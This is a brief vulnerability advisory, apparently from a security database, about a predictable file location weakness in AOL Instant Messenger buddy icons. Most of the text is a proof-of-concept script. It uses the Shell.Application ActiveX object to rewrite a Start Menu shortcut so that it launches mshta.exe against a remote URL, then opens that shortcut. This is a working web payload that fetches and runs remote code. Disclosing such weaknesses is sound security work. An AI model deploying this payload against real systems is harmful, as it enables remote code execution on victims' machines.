|
AOL Instant Messenger Buddy Icon Predictable File Location Weakness
The following proof of concept example has been supplied: <script> var ok = new ActiveXObject("Shell.Application"); f = ok.NameSpace("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Accessories"); i= f.ParseName("Paint.lnk"); l = i.GetLink; l.Path = "mshta.exe" l.Arguments ="http://www.example.com" l.Save("C:\\paint.lnk"); ok.Open("C:\\paint.lnk"); </script> |
|
|
Privacy Statement |
